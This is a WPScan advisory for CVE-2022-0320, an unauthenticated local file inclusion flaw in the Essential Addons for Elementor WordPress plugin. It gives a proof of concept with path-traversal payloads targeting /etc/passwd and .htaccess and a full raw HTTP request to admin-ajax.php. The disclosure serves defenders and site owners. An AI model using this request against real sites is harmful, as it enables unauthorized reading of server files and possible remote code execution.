WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI

Description

The plugin does not validate and sanitise some template data before it them in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attack and read arbitrary files on the server, this could also lead to RCE via user uploaded files or other LFI to RCE techniques.

Proof of Concept

- Create a simple page and edit with Elementor
- Add a Post Grid with the Show Load More option enabled (in the Layout Settings section of the widget, default is disabled)

- As an unauthenticated user, navigate to that page and intercept the request made when clicking the Load More button
- Change the template_info[file_name] parameter with a payload such as ../../../../../../.htaccess, ../../../../../../../../etc/passwd etc (the template_info[name] is also vulnerable)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

The ajax_eael_product_gallery AJAX action (Product Grid widget) is also affected 

Affects Plugins

essential-addons-for-elementor-lite
Fixed in version 5.0.9

References

CVE
CVE-2022-0320

Classification

Type

LFI

OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Original Researcher

Wai Yan Myo Thet

Submitter

Wai Yan Myo Thet

Verified

Yes

WPVDB ID
0d02b222-e672-4ac0-a1d4-d34e1ecf4a95

Timeline

Publicly Published

2022-01-31 (about 12 months ago)

Added

2022-01-31 (about 12 months ago)

Last Updated

2022-04-12 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us